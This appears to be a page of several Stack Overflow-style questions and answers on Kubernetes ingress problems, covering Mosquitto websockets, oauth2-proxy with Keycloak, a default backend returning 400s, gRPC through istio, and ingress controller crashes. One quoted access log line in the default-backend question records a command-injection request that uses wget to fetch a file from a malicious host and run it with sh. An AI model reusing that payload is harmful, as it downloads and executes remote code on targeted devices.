Can't upgrade websocket connection in Kubernetes using Nginx-ingress

I'm trying to connect to my Mosquitto broker over WebSockets, but the connection never upgrades. The broker exposes port 9001 for WebSocket connections and runs in a Kubernetes cluster behind an nginx-ingress controller.
$ kubectl get ingress mosquitto
NAME HOSTS ADDRESS PORTS AGE
mosquitto * 80 14m
$kubectl get service
NAME TYPE CLUSTER-IP EXTERNAL-IP PORT(S) AGE
mosquitto ClusterIP 10.108.206.11 <none> 9001/TCP,1883/TCP 12m
Mosquitto.yaml:
apiVersion: apps/v1beta1
kind: Deployment
metadata:
  name: mosquitto
spec:
  replicas: 1
  template:
    metadata:
      labels:
        app: mosquitto
    spec:
      imagePullSecrets:
      - name: abb-login
      containers:
      - name: mosquitto
        image: ***/mosquitto:k8s2
        imagePullPolicy: Always
        ports:
        - containerPort: 9001
          protocol: TCP
        - containerPort: 1883
          protocol: TCP
        resources: {}
---
apiVersion: v1
kind: Service
metadata:
  name: mosquitto
spec:
  ports:
  - name: "9001"
    port: 9001
    targetPort: 9001
    protocol: TCP
  - name: "1883"
    port: 1883
    targetPort: 1883
    protocol: TCP
  selector:
    app: mosquitto
Mosquitto.conf:
allow_duplicate_messages false
connection_messages true
log_dest stdout stderr
log_timestamp true
log_type all
persistence false
listener 1883
allow_anonymous true
listener 9001
protocol websockets
allow_anonymous false
auth_plugin /usr/lib/mosquitto-auth-plugin/auth-plugin.so
auth_opt_backends http
auth_opt_http_ip 127.0.0.1
auth_opt_http_getuser_uri /api/mosquitto/users
auth_opt_http_superuser_uri /api/mosquitto/admins
auth_opt_http_aclcheck_uri /api/mosquitto/permissions
auth_opt_acl_cacheseconds 1
auth_opt_auth_cacheseconds 0
Ingress.yaml:
apiVersion: extensions/v1beta1
kind: Ingress
metadata:
  name: mosquitto
  annotations:
    nginx.org/websocket-services: mosquitto
spec:
  rules:
  - http:
      paths:
      - path: /mosquitto-ws
        backend:
          serviceName: mosquitto
          servicePort: 80
Error from the client:
MqttException (0) - java.io.IOException: WebSocket Response header: Incorrect upgrade.
opc-ua-adapter_1 | at org.eclipse.paho.client.mqttv3.internal.ExceptionHelper.createMqttException(ExceptionHelper.java:38)
opc-ua-adapter_1 | at org.eclipse.paho.client.mqttv3.internal.ClientComms$ConnectBG.run(ClientComms.java:715)
opc-ua-adapter_1 | at java.base/java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:515)
opc-ua-adapter_1 | at java.base/java.util.concurrent.FutureTask.run(FutureTask.java:264)
opc-ua-adapter_1 | at java.base/java.util.concurrent.ScheduledThreadPoolExecutor$ScheduledFutureTask.run(ScheduledThreadPoolExecutor.java:304)
opc-ua-adapter_1 | at java.base/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1128)
opc-ua-adapter_1 | at java.base/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:628)
opc-ua-adapter_1 | at java.base/java.lang.Thread.run(Thread.java:834)
Kubernetes ingress-nginx pod logs:
192.168.39.1 - [192.168.39.1] - - [27/Feb/2019:09:59:14 +0000] "GET /mosquitto-ws HTTP/1.1" 308 171 "-" "-" 218 0.000 [default-mosquitto-9001] - - - - 5db23bb19698ac94612ff6ebac265bed
192.168.39.1 - [192.168.39.1] - - [27/Feb/2019:09:59:14 +0000] "\x88\x84\xDDi+\x5C\xECY\x1Bl" 400 157 "-" "-" 0 0.000 [] - - - - 2b8f177f0f62389ba7d918f9c36ee72e
192.168.39.1 - [192.168.39.1] - - [27/Feb/2019:09:59:14 +0000] "GET /mosquitto-ws HTTP/1.1" 308 171 "-" "-" 218 0.000 [default-mosquitto-9001] - - - - c99fe7606530ae938297e227e34084c0
192.168.39.1 - [192.168.39.1] - - [27/Feb/2019:09:59:14 +0000] "\x88\x84dB5aUr\x05Q" 400 157 "-" "-" 0 0.000 [] - - - - 375ec1ac17cc3e0f7595cf8c1cc752c3

Try increasing proxy-read-timeout and proxy-send-timeout on your mosquitto Ingress definition.
See the NGINX Ingress docs:
https://kubernetes.github.io/ingress-nginx/user-guide/miscellaneous/#websockets
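With the in-cluster kubernetes/ingress-nginx controller (the one producing the logs above), those timeouts are set with annotations. Below is a minimal sketch of the mosquitto Ingress with them added, assuming one-hour timeouts are acceptable for your MQTT clients; the backend here also points at the Service's 9001 WebSocket port, since the Service above does not expose port 80:
apiVersion: extensions/v1beta1
kind: Ingress
metadata:
  name: mosquitto
  annotations:
    # WebSocket connections are long-lived; without these, the proxy drops
    # the upgraded connection after the default 60s of inactivity.
    nginx.ingress.kubernetes.io/proxy-read-timeout: "3600"
    nginx.ingress.kubernetes.io/proxy-send-timeout: "3600"
spec:
  rules:
  - http:
      paths:
      - path: /mosquitto-ws
        backend:
          serviceName: mosquitto
          servicePort: 9001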

Related

OAuth2 Proxy pod keeps crashing when used with Keycloak in oidc mode on Kubernetes

I'm trying to run a minimalistic sample of oauth2-proxy with Keycloak. I used oauth2-proxy's k8s example, which uses dex, to build up my keycloak example.
The problem is that I don't seem to get the proxy to work:
# kubectl get pods
NAME READY STATUS RESTARTS AGE
httpbin-774999875d-zbczh 1/1 Running 0 2m49s
keycloak-758d7c758-27pgh 1/1 Running 0 2m49s
oauth2-proxy-5875dd67db-8qwqn 0/1 CrashLoopBackOff 2 2m49s
Logs indicate a network error:
# kubectl logs oauth2-proxy-5875dd67db-8qwqn
[2021/09/22 08:14:56] [main.go:54] Get "http://keycloak.localtest.me/auth/realms/master/.well-known/openid-configuration": dial tcp 127.0.0.1:80: connect: connection refused
I believe I have set up the ingress correctly, though.
Steps to reproduce
Set up the cluster:
#Create kind cluster
wget https://raw.githubusercontent.com/oauth2-proxy/oauth2-proxy/master/contrib/local-environment/kubernetes/kind-cluster.yaml
kind create cluster --name oauth2-proxy --config kind-cluster.yaml
#Setup dns
wget https://raw.githubusercontent.com/oauth2-proxy/oauth2-proxy/master/contrib/local-environment/kubernetes/custom-dns.yaml
kubectl apply -f custom-dns.yaml
kubectl -n kube-system rollout restart deployment/coredns
kubectl -n kube-system rollout status --timeout 5m deployment/coredns
#Setup ingress
kubectl apply -f https://raw.githubusercontent.com/kubernetes/ingress-nginx/master/deploy/static/provider/kind/deploy.yaml
kubectl --namespace ingress-nginx rollout status --timeout 5m deployment/ingress-nginx-controller
#Deploy
#import keycloak master realm
wget https://raw.githubusercontent.com/oauth2-proxy/oauth2-proxy/master/contrib/local-environment/keycloak/master-realm.json
kubectl create configmap keycloak-import-config --from-file=master-realm.json=master-realm.json
Deploy the test application. My deployment.yaml file:
###############oauth2-proxy#############
apiVersion: apps/v1
kind: Deployment
metadata:
  creationTimestamp: null
  labels:
    name: oauth2-proxy
  name: oauth2-proxy
spec:
  replicas: 1
  selector:
    matchLabels:
      name: oauth2-proxy
  template:
    metadata:
      labels:
        name: oauth2-proxy
    spec:
      containers:
      - args:
        - --provider=oidc
        - --oidc-issuer-url=http://keycloak.localtest.me/auth/realms/master
        - --upstream="file://dev/null"
        - --client-id=oauth2-proxy
        - --client-secret=72341b6d-7065-4518-a0e4-50ee15025608
        - --cookie-secret=x-1vrrMhC-886ITuz8ySNw==
        - --email-domain=*
        - --scope=openid profile email users
        - --cookie-domain=.localtest.me
        - --whitelist-domain=.localtest.me
        - --pass-authorization-header=true
        - --pass-access-token=true
        - --pass-user-headers=true
        - --set-authorization-header=true
        - --set-xauthrequest=true
        - --cookie-refresh=1m
        - --cookie-expire=30m
        - --http-address=0.0.0.0:4180
        image: quay.io/oauth2-proxy/oauth2-proxy:latest
        # image: "quay.io/pusher/oauth2_proxy:v5.1.0"
        name: oauth2-proxy
        ports:
        - containerPort: 4180
          name: http
          protocol: TCP
        livenessProbe:
          httpGet:
            path: /ping
            port: http
            scheme: HTTP
          initialDelaySeconds: 0
          timeoutSeconds: 1
        readinessProbe:
          httpGet:
            path: /ping
            port: http
            scheme: HTTP
          initialDelaySeconds: 0
          timeoutSeconds: 1
          successThreshold: 1
          periodSeconds: 10
        resources:
          {}
---
apiVersion: v1
kind: Service
metadata:
  labels:
    app: oauth2-proxy
  name: oauth2-proxy
spec:
  type: ClusterIP
  ports:
  - port: 4180
    targetPort: 4180
    name: http
  selector:
    name: oauth2-proxy
---
apiVersion: extensions/v1beta1
kind: Ingress
metadata:
  labels:
    app: oauth2-proxy
  name: oauth2-proxy
  annotations:
    nginx.ingress.kubernetes.io/server-snippet: |
      large_client_header_buffers 4 32k;
spec:
  rules:
  - host: oauth2-proxy.localtest.me
    http:
      paths:
      - path: /
        backend:
          serviceName: oauth2-proxy
          servicePort: 4180
---
# ######################httpbin##################
apiVersion: apps/v1
kind: Deployment
metadata:
  name: httpbin
spec:
  replicas: 1
  selector:
    matchLabels:
      name: httpbin
  template:
    metadata:
      labels:
        name: httpbin
    spec:
      containers:
      - image: kennethreitz/httpbin:latest
        name: httpbin
        resources: {}
        ports:
        - name: http
          containerPort: 80
          protocol: TCP
        livenessProbe:
          httpGet:
            path: /
            port: http
        readinessProbe:
          httpGet:
            path: /
            port: http
      hostname: httpbin
      restartPolicy: Always
---
apiVersion: v1
kind: Service
metadata:
  name: httpbin-svc
  labels:
    app: httpbin
spec:
  type: ClusterIP
  ports:
  - port: 80
    targetPort: http
    protocol: TCP
    name: http
  selector:
    name: httpbin
---
apiVersion: networking.k8s.io/v1beta1
kind: Ingress
metadata:
  name: httpbin
  labels:
    name: httpbin
  annotations:
    nginx.ingress.kubernetes.io/auth-response-headers: X-Auth-Request-User,X-Auth-Request-Email
    nginx.ingress.kubernetes.io/auth-signin: http://oauth2-proxy.localtest.me/oauth2/start
    nginx.ingress.kubernetes.io/auth-url: http://oauth2-proxy.localtest.me/oauth2/auth
spec:
  rules:
  - host: httpbin.localtest.me
    http:
      paths:
      - path: /
        backend:
          serviceName: httpbin-svc
          servicePort: 80
---
# ######################keycloak#############
apiVersion: apps/v1
kind: Deployment
metadata:
  labels:
    app: keycloak
  name: keycloak
spec:
  replicas: 1
  selector:
    matchLabels:
      app: keycloak
  template:
    metadata:
      labels:
        app: keycloak
    spec:
      containers:
      - args:
        - -Dkeycloak.migration.action=import
        - -Dkeycloak.migration.provider=singleFile
        - -Dkeycloak.migration.file=/etc/keycloak_import/master-realm.json
        - -Dkeycloak.migration.strategy=IGNORE_EXISTING
        env:
        - name: KEYCLOAK_PASSWORD
          value: password
        - name: KEYCLOAK_USER
          value: admin#example.com
        - name: KEYCLOAK_HOSTNAME
          value: keycloak.localtest.me
        - name: PROXY_ADDRESS_FORWARDING
          value: "true"
        image: quay.io/keycloak/keycloak:15.0.2
        # image: jboss/keycloak:10.0.0
        name: keycloak
        ports:
        - name: http
          containerPort: 8080
        - name: https
          containerPort: 8443
        readinessProbe:
          httpGet:
            path: /auth/realms/master
            port: 8080
        volumeMounts:
        - mountPath: /etc/keycloak_import
          name: keycloak-config
      hostname: keycloak
      volumes:
      - configMap:
          defaultMode: 420
          name: keycloak-import-config
        name: keycloak-config
---
apiVersion: v1
kind: Service
metadata:
  name: keycloak-svc
  labels:
    app: keycloak
spec:
  type: ClusterIP
  sessionAffinity: None
  ports:
  - name: http
    targetPort: http
    port: 8080
  selector:
    app: keycloak
---
apiVersion: extensions/v1beta1
kind: Ingress
metadata:
  name: keycloak
spec:
  tls:
  - hosts:
    - "keycloak.localtest.me"
  rules:
  - host: "keycloak.localtest.me"
    http:
      paths:
      - path: /
        backend:
          serviceName: keycloak-svc
          servicePort: 8080
---
# kubectl apply -f deployment.yaml
Configure the /etc/hosts file on the development machine to include the localtest.me domains:
127.0.0.1 oauth2-proxy.localtest.me
127.0.0.1 keycloak.localtest.me
127.0.0.1 httpbin.localtest.me
127.0.0.1 localhost
Note that I can reach http://keycloak.localtest.me/auth/realms/master/.well-known/openid-configuration with no problem from my host browser. It appears that the oauth2-proxy's pod cannot reach the service via the ingress. Would really appreciate any sort of help here.
Turned out that I needed to add keycloak to custom-dns.yaml.
apiVersion: v1
data:
  Corefile: |
    .:53 {
        errors
        health {
            lameduck 5s
        }
        ready
        kubernetes cluster.local in-addr.arpa ip6.arpa {
            pods insecure
            fallthrough in-addr.arpa ip6.arpa
            ttl 30
        }
        prometheus :9153
        forward . /etc/resolv.conf
        cache 30
        loop
        reload
        loadbalance
        hosts {
            10.244.0.1 dex.localtest.me. # <----Configured for dex
            10.244.0.1 oauth2-proxy.localtest.me
            fallthrough
        }
    }
kind: ConfigMap
metadata:
  name: coredns
  namespace: kube-system
With keycloak added, it looks like this:
apiVersion: v1
data:
  Corefile: |
    .:53 {
        errors
        health {
            lameduck 5s
        }
        ready
        kubernetes cluster.local in-addr.arpa ip6.arpa {
            pods insecure
            fallthrough in-addr.arpa ip6.arpa
            ttl 30
        }
        prometheus :9153
        forward . /etc/resolv.conf
        cache 30
        loop
        reload
        loadbalance
        hosts {
            10.244.0.1 keycloak.localtest.me
            10.244.0.1 oauth2-proxy.localtest.me
            fallthrough
        }
    }
kind: ConfigMap
metadata:
  name: coredns
  namespace: kube-system
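To roll the change out, the same commands used during cluster setup can be re-run so CoreDNS picks up the new hosts entry (a sketch, assuming custom-dns.yaml is the edited file from the steps above):
# Re-apply the edited CoreDNS ConfigMap and restart CoreDNS
kubectl apply -f custom-dns.yaml
kubectl -n kube-system rollout restart deployment/coredns
kubectl -n kube-system rollout status --timeout 5m deployment/coredns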

Kubernetes nginx controller, no traffic to default backend: 400s should be 404s

I have an issue where all unknown endpoints are getting 400s returned by the ingress-controller itself. It does not send any traffic to the default backend. Other traffic to defined Ingress points is working fine.
I noticed this in my ingress-controller's logs: every night I get what look to be hand-rolled compromise attempts, and I assume the attacker (or script) keeps trying because they get 400s rather than 404s, so those endpoints are presumed to be potentially accessible when they are not.
I am unsure if it's due to the way I deployed my nginx-ingress-controller or if it's because of how I have set up my ingresses. The ingress-controller is really just a generic Helm deployment.
Here is part of its deployment manifest:
Name: fashionable-gopher-nginx-ingress-controller
Namespace: kube-system
CreationTimestamp: Tue, 03 Jul 2018 14:02:46 -0700
Labels: app=nginx-ingress
chart=nginx-ingress-0.20.3
component=controller
heritage=Tiller
release=fashionable-gopher
Annotations: deployment.kubernetes.io/revision=1
Selector: app=nginx-ingress,component=controller,release=fashionable-gopher
Replicas: 1 desired | 1 updated | 1 total | 1 available | 0 unavailable
StrategyType: RollingUpdate
MinReadySeconds: 0
RollingUpdateStrategy: 1 max unavailable, 1 max surge
Pod Template:
Labels: app=nginx-ingress
component=controller
release=fashionable-gopher
Service Account: fashionable-gopher-nginx-ingress
Containers:
nginx-ingress-controller:
Image: quay.io/kubernetes-ingress-controller/nginx-ingress-controller:0.14.0
Ports: 80/TCP, 443/TCP
Host Ports: 0/TCP, 0/TCP
Args:
/nginx-ingress-controller
--default-backend-service=kube-system/fashionable-gopher-nginx-ingress-default-backend
Here's an example 400 in the logs, which should be a 404 (no "login.cgi" endpoint exists anywhere):
10.244.3.1 - [10.244.3.1] - - [22/Aug/2018:23:52:35 +0000] "GET /login.cgi?cli=aa%20aa%27;wget%20http://some.malicious.ip.address/bin%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 174 "-" "Hakai/2.0" 203 0.000 [] - - - -
Here's the default backend:
Name: fashionable-gopher-nginx-ingress-default-backend
Namespace: kube-system
CreationTimestamp: Tue, 03 Jul 2018 14:02:46 -0700
Labels: app=nginx-ingress
chart=nginx-ingress-0.20.3
component=default-backend
heritage=Tiller
release=fashionable-gopher
Annotations: deployment.kubernetes.io/revision=1
Selector: app=nginx-ingress,component=default-backend,release=fashionable-gopher
Replicas: 1 desired | 1 updated | 1 total | 1 available | 0 unavailable
StrategyType: RollingUpdate
MinReadySeconds: 0
RollingUpdateStrategy: 1 max unavailable, 1 max surge
Pod Template:
Labels: app=nginx-ingress
component=default-backend
release=fashionable-gopher
Containers:
nginx-ingress-default-backend:
Image: k8s.gcr.io/defaultbackend:1.3
Lastly, here are some pieces of the nginx.conf from the ingress-controller. I'm not an nginx.conf expert, but it looks correct to me:
...
upstream upstream-default-backend {
    least_conn;
    keepalive 32;
}

server 10.100.3.10:8080 max_fails=0 fail_timeout=0;

location / {
    log_by_lua_block {
    }
    if ($scheme = https) {
        more_set_headers "Strict-Transport-Security: max-age=15724800; includeSubDomains";
    }
    access_log off;
    port_in_redirect off;
    set $proxy_upstream_name "upstream-default-backend";
    set $namespace "";
    set $ingress_name "";
    set $service_name "";
    client_max_body_size "1m";
    # In case of errors try the next upstream server before returning an error
    proxy_next_upstream error timeout invalid_header http_502 http_503 http_504;
    proxy_next_upstream_tries 0;
    proxy_pass http://upstream-default-backend;
    proxy_redirect off;
}
One note: before I set up my first Ingresses (for other domains), traffic did make it to my default backend and return 404s.
What should I do now to debug this issue and figure out why these 400s are not getting sent to my default backend?
Edit:
Here's the default backend's deployment definition:
kubectl get deployment fashionable-gopher-nginx-ingress-default-backend -o yaml -n kube-system
apiVersion: extensions/v1beta1
kind: Deployment
metadata:
  annotations:
    deployment.kubernetes.io/revision: "1"
  creationTimestamp: 2018-07-03T21:02:46Z
  generation: 1
  labels:
    app: nginx-ingress
    chart: nginx-ingress-0.20.3
    component: default-backend
    heritage: Tiller
    release: fashionable-gopher
  name: fashionable-gopher-nginx-ingress-default-backend
  namespace: kube-system
  resourceVersion:
spec:
  progressDeadlineSeconds: 600
  replicas: 1
  revisionHistoryLimit: 10
  selector:
    matchLabels:
      app: nginx-ingress
      component: default-backend
      release: fashionable-gopher
  strategy:
    rollingUpdate:
      maxSurge: 1
      maxUnavailable: 1
    type: RollingUpdate
  template:
    metadata:
      creationTimestamp: null
      labels:
        app: nginx-ingress
        component: default-backend
        release: fashionable-gopher
    spec:
      containers:
      - image: k8s.gcr.io/defaultbackend:1.3
        imagePullPolicy: IfNotPresent
        livenessProbe:
          failureThreshold: 3
          httpGet:
            path: /healthz
            port: 8080
            scheme: HTTP
          initialDelaySeconds: 30
          periodSeconds: 10
          successThreshold: 1
          timeoutSeconds: 5
        name: nginx-ingress-default-backend
        ports:
        - containerPort: 8080
          name: http
          protocol: TCP
        resources: {}
        terminationMessagePath: /dev/termination-log
        terminationMessagePolicy: File
      dnsPolicy: ClusterFirst
      restartPolicy: Always
      schedulerName: default-scheduler
      securityContext: {}
      terminationGracePeriodSeconds: 60
status:
  availableReplicas: 1
  conditions:
  - lastTransitionTime: 2018-07-03T21:02:46Z
    lastUpdateTime: 2018-07-03T21:02:46Z
    message: Deployment has minimum availability.
    reason: MinimumReplicasAvailable
    status: "True"
    type: Available
  - lastTransitionTime: 2018-07-28T16:19:57Z
    lastUpdateTime: 2018-07-28T16:22:06Z
    message: ReplicaSet "fashionable-gopher-nginx-ingress-default-backend-5ffffffff"
      has successfully progressed.
    reason: NewReplicaSetAvailable
    status: "True"
    type: Progressing
  observedGeneration: 1
  readyReplicas: 1
  replicas: 1
  updatedReplicas: 1
Edit
Here's the only ingress I have defined for now:
Name: default-myserver-ingress
Namespace: default
Address:
Default backend: default-http-backend:80 (<none>)
TLS:
myapp-tls-host-secrets terminates someapp.somehostname.com
Rules:
Host Path Backends
---- ---- --------
someapp.somehostname.com
/ my-api:8000 (<none>)
Annotations:
kubectl.kubernetes.io/last-applied-configuration: {"apiVersion":"extensions/v1beta1","kind":"Ingress","metadata":{"annotations":{"kubernetes.io/ingress.class":"nginx"},"name":"default-myserver-ingress","namespace":"default"},"spec":{"rules":[{"host":"someapp.somehostname.com","http":{"paths":[{"backend":{"serviceName":"my-api","servicePort":8000},"path":"/"}]}}],"tls":[{"hosts":["someapp.somehostname.com"],"secretName":"myapp-tls-host-secrets"}]}}
kubernetes.io/ingress.class: nginx
Events: <none>
This ingress is defined for a hostname such as someapp.somehostname.com. However, that hostname is a CNAME. The A record associated with the same IP address is receiving the problematic traffic I mentioned above (even though that name isn't defined in any of my Ingress definitions), and that traffic is not going to the default backend when I think it should be. Does that make sense?
Edit:
Here's the result of kubectl get deployment fashionable-gopher-nginx-ingress-controller -n kube-system -o yaml:
apiVersion: extensions/v1beta1
kind: Deployment
metadata:
  annotations:
    deployment.kubernetes.io/revision: "1"
  creationTimestamp: 2018-07-03T21:02:46Z
  generation: 1
  labels:
    app: nginx-ingress
    chart: nginx-ingress-0.20.3
    component: controller
    heritage: Tiller
    release: fashionable-gopher
  name: fashionable-gopher-nginx-ingress-controller
  namespace: kube-system
  resourceVersion: "7461558"
  selfLink: /apis/extensions/v1beta1/namespaces/kube-system/deployments/fashionable-gopher-nginx-ingress-controller
spec:
  progressDeadlineSeconds: 600
  replicas: 1
  revisionHistoryLimit: 10
  selector:
    matchLabels:
      app: nginx-ingress
      component: controller
      release: fashionable-gopher
  strategy:
    rollingUpdate:
      maxSurge: 1
      maxUnavailable: 1
    type: RollingUpdate
  template:
    metadata:
      creationTimestamp: null
      labels:
        app: nginx-ingress
        component: controller
        release: fashionable-gopher
    spec:
      containers:
      - args:
        - /nginx-ingress-controller
        - --default-backend-service=kube-system/fashionable-gopher-nginx-ingress-default-backend
        - --election-id=ingress-controller-leader
        - --ingress-class=nginx
        - --configmap=kube-system/fashionable-gopher-nginx-ingress-controller
        env:
        - name: POD_NAME
          valueFrom:
            fieldRef:
              apiVersion: v1
              fieldPath: metadata.name
        - name: POD_NAMESPACE
          valueFrom:
            fieldRef:
              apiVersion: v1
              fieldPath: metadata.namespace
        image: quay.io/kubernetes-ingress-controller/nginx-ingress-controller:0.14.0
        imagePullPolicy: IfNotPresent
        livenessProbe:
          failureThreshold: 3
          httpGet:
            path: /healthz
            port: 10254
            scheme: HTTP
          initialDelaySeconds: 10
          periodSeconds: 10
          successThreshold: 1
          timeoutSeconds: 1
        name: nginx-ingress-controller
        ports:
        - containerPort: 80
          name: http
          protocol: TCP
        - containerPort: 443
          name: https
          protocol: TCP
        readinessProbe:
          failureThreshold: 3
          httpGet:
            path: /healthz
            port: 10254
            scheme: HTTP
          initialDelaySeconds: 10
          periodSeconds: 10
          successThreshold: 1
          timeoutSeconds: 1
        resources: {}
        terminationMessagePath: /dev/termination-log
        terminationMessagePolicy: File
      dnsPolicy: ClusterFirst
      restartPolicy: Always
      schedulerName: default-scheduler
      securityContext: {}
      serviceAccount: fashionable-gopher-nginx-ingress
      serviceAccountName: fashionable-gopher-nginx-ingress
      terminationGracePeriodSeconds: 60
status:
  availableReplicas: 1
  conditions:
  - lastTransitionTime: 2018-07-03T21:02:46Z
    lastUpdateTime: 2018-07-03T21:02:46Z
    message: Deployment has minimum availability.
    reason: MinimumReplicasAvailable
    status: "True"
    type: Available
  - lastTransitionTime: 2018-07-28T16:29:07Z
    lastUpdateTime: 2018-07-28T16:31:53Z
    message: ReplicaSet "fashionable-gopher-nginx-ingress-controller-69d44d4df4" has
      successfully progressed.
    reason: NewReplicaSetAvailable
    status: "True"
    type: Progressing
  observedGeneration: 1
  readyReplicas: 1
  replicas: 1
  updatedReplicas: 1

gRPC grpc-status: 8

I am having trouble getting through with gRPC from outside the cluster to the istio-ingress on Kubernetes.
But I have come so far that I can get a 200 response. I expect the HTTP/1.1 in the response is just curl not supporting HTTP/2.
Any help is appreciated, thanks!
HTTP/1.1 200 OK
content-type: application/grpc
grpc-status: 8
grpc-message: malformed method name: "/ghw"
x-envoy-upstream-service-time: 8
date: Thu, 03 May 2018 18:33:28 GMT
server: envoy
content-length: 0
The YAML setup is as follows:
apiVersion: apps/v1beta1
kind: Deployment
metadata:
  name: grpc-deployment
  labels:
    app: grpc
spec:
  selector:
    matchLabels:
      app: grpc
  replicas: 1
  template:
    metadata:
      labels:
        app: grpc
    spec:
      containers:
      - name: grpc
        image: local/gcd
        imagePullPolicy: Never
        ports:
        - name: grpc-port
          containerPort: 3000
          # protocol: HTTP2
---
apiVersion: v1
kind: Service
metadata:
  name: grpc-service
spec:
  # type: LoadBalancer
  selector:
    app: grpc
  ports:
  - port: 3000
    name: grpc
    # protocol: HTTP2
    targetPort: 3000
---
apiVersion: extensions/v1beta1
kind: Ingress
metadata:
  name: grpc-ingress
  annotations:
    kubernetes.io/ingress.class: "istio"
    # ingress.kubernetes.io/ssl-passthrough: "true"
spec:
  rules:
  - http:
      paths:
      - path: /ghw
        backend:
          serviceName: grpc-service
          servicePort: 3000

Setting up Ingress (Kubernetes)

I want to set up an Ingress, which routes traffic to my underlying Services. Unfortunately, I get an error when I deploy my ingress-controller-deployment.yaml and I don't know why... The pod with the ingress-controller crashes immediately, with the error message "CrashLoopBackOff".
As I understand it, the ingress controller has to be deployed in a Pod, and this pod can be accessed through the ingress-svc. The ingress-svc seems to work, but the Pod crashes. Once the ingress-controller works I need an additional file that defines the routes and everything, but I don't see the point of continuing without a working and deployable ingress-controller.
Pod description:
Name: ingress-controller-7749c785f-x94ll
Namespace: ingress
Node: gke-cluster-1-default-pool-8484e77d-r4wp/10.128.0.2
Start Time: Thu, 26 Apr 2018 14:25:04 +0200
Labels: k8s-app=nginx-ingress-lb
pod-template-hash=330573419
Annotations: kubernetes.io/created-by={"kind":"SerializedReference","apiVersion":"v1","reference":{"kind":"ReplicaSet","namespace":"ingress","name":"ingress-controller-7749c785f","uid":"d8ff0a6d-494c-11e8-a840
-420...
Status: Running
IP: 10.8.0.14
Created By: ReplicaSet/ingress-controller-7749c785f
Controlled By: ReplicaSet/ingress-controller-7749c785f
Containers:
nginx-ingress-controller:
Container ID: docker://5654c7dffc44510132cba303d66ee570280f2cec235e4d4fa6ef8ad543e0c91d
Image: quay.io/kubernetes-ingress-controller/nginx-ingress-controller:0.9.0
Image ID: docker-pullable://quay.io/kubernetes-ingress-controller/nginx-ingress-controller#sha256:39cc6ce23e5bcdf8aa78bc28bbcfe0999e449bf99fe2e8d60984b417facc5cd4
Ports: 80/TCP, 443/TCP
Args:
/nginx-ingress-controller
--admin-backend-svc=$(POD_NAMESPACE)/admin-backend
State: Waiting
Reason: CrashLoopBackOff
Last State: Terminated
Reason: Error
Exit Code: 2
Started: Thu, 26 Apr 2018 14:26:57 +0200
Finished: Thu, 26 Apr 2018 14:26:57 +0200
Ready: False
Restart Count: 4
Liveness: http-get http://:10254/healthz delay=10s timeout=5s period=10s #success=1 #failure=3
Environment:
POD_NAME: ingress-controller-7749c785f-x94ll (v1:metadata.name)
POD_NAMESPACE: ingress (v1:metadata.namespace)
Mounts:
/var/run/secrets/kubernetes.io/serviceaccount from default-token-plbss (ro)
Conditions:
Type Status
Initialized True
Ready False
PodScheduled True
Volumes:
default-token-plbss:
Type: Secret (a volume populated by a Secret)
SecretName: default-token-plbss
Optional: false
QoS Class: BestEffort
Node-Selectors: <none>
Tolerations: node.alpha.kubernetes.io/notReady:NoExecute for 300s
node.alpha.kubernetes.io/unreachable:NoExecute for 300s
Ingress-controller-deployment.yaml
apiVersion: extensions/v1beta1
kind: Deployment
metadata:
  name: ingress-controller
spec:
  replicas: 1
  revisionHistoryLimit: 3
  template:
    metadata:
      labels:
        k8s-app: nginx-ingress-lb
    spec:
      containers:
      - args:
        - /nginx-ingress-controller
        - "--admin-backend-svc=$(POD_NAMESPACE)/admin-backend"
        env:
        - name: POD_NAME
          valueFrom:
            fieldRef:
              fieldPath: metadata.name
        - name: POD_NAMESPACE
          valueFrom:
            fieldRef:
              fieldPath: metadata.namespace
        image: "quay.io/kubernetes-ingress-controller/nginx-ingress-controller:0.9.0"
        imagePullPolicy: Always
        livenessProbe:
          httpGet:
            path: /healthz
            port: 10254
            scheme: HTTP
          initialDelaySeconds: 10
          timeoutSeconds: 5
        name: nginx-ingress-controller
        ports:
        - containerPort: 80
          name: http
          protocol: TCP
        - containerPort: 443
          name: https
          protocol: TCP
---
apiVersion: v1
kind: Service
metadata:
  name: ingress-svc
spec:
  type: LoadBalancer
  ports:
  - name: http
    port: 80
    targetPort: http
  - name: https
    port: 443
    targetPort: https
  selector:
    k8s-app: nginx-ingress-lb
The issue is the args. The args on one of mine are
args:
- /nginx-ingress-controller
- --default-backend-service=$(POD_NAMESPACE)/default-http-backend
- --configmap=$(POD_NAMESPACE)/nginx-configuration
- --tcp-services-configmap=$(POD_NAMESPACE)/tcp-services
- --udp-services-configmap=$(POD_NAMESPACE)/udp-services
- --publish-service=$(POD_NAMESPACE)/ingress-nginx
- --annotations-prefix=nginx.ingress.kubernetes.io
I had also created the config maps for configuration, tcp and udp.
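In the stock ingress-nginx manifests these are created as plain, initially empty ConfigMaps. A minimal sketch, assuming the controller runs in the ingress namespace used in the question (the names must match what the args above reference):
apiVersion: v1
kind: ConfigMap
metadata:
  name: nginx-configuration   # referenced by --configmap
  namespace: ingress
---
apiVersion: v1
kind: ConfigMap
metadata:
  name: tcp-services          # referenced by --tcp-services-configmap
  namespace: ingress
---
apiVersion: v1
kind: ConfigMap
metadata:
  name: udp-services          # referenced by --udp-services-configmap
  namespace: ingress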

k8s nginx container return json response

I have a k8s cluster running, among other things, an nginx.
When I do curl -v <url> I get:
HTTP/1.1 200 OK
< Content-Type: text/html
< Date: Fri, 24 Mar 2017 15:25:27 GMT
< Server: nginx
< Strict-Transport-Security: max-age=15724800; includeSubDomains; preload
< Content-Length: 0
< Connection: keep-alive
<
* Curl_http_done: called premature == 0
* Connection #0 to host <url> left intact
However, when I do curl -v <url> -H 'Accept: application/json' I get:
< HTTP/1.1 200 OK
< Content-Type: text/html
< Date: Fri, 24 Mar 2017 15:26:10 GMT
< Server: nginx
< Strict-Transport-Security: max-age=15724800; includeSubDomains; preload
< Content-Length: 0
< Connection: keep-alive
<
* Curl_http_done: called premature == 0
* Connection #0 to host <url> left intact
* Could not resolve host: application
* Closing connection 1
curl: (6) Could not resolve host: application
My task is to get the request to return JSON, not HTML.
To my understanding I have to create an ingress controller and modify the nginx.conf somehow. I've been trying for a few days now but can't get it right. Any kind of help would be most appreciated.
The following are the YAML files I've been using:
configmap:
apiVersion: v1
data:
  server-tokens: "false"
  proxy-body-size: "4110m"
